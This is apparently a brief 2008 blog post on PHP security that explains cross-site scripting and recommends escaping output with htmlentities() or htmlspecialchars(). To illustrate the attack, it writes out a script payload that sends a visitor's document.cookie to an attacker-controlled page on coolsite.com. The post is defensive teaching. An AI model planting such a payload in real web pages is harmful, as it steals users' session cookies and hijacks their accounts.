PHP Security: Cross-Site scripting

Aug 10th, 2008
Cross-Site scripting is one of the best know attack. Any web application that displays input is at risk. In this Web 2.0 time this attack can be easy to do.

Suppose a user has entered this data in input in form:


Hi, I am cool.
<script> 
document.location = 'http://coolsite.com/stolen_cookie.php?cookies=' + document.cookie
</script>
Displaying this data to your users will send all the cookie of your web application related to the current user to the coolsite.com site. This coolsite.com can access those cookie in $_GET['cookie'].
It is good for this threat that Ajax do not allow accessing remote site page. Otherwise cookie data can be sent without redirecting the user.

Only filtering input and escaping output can solve this problem. Htmlentities() or htmlspecialchars() can be used here in PHP.

Related:

 
Possibly Related posts:
  1. No comments yet.
Comments are open for an year period. Please, write here on Facebook page.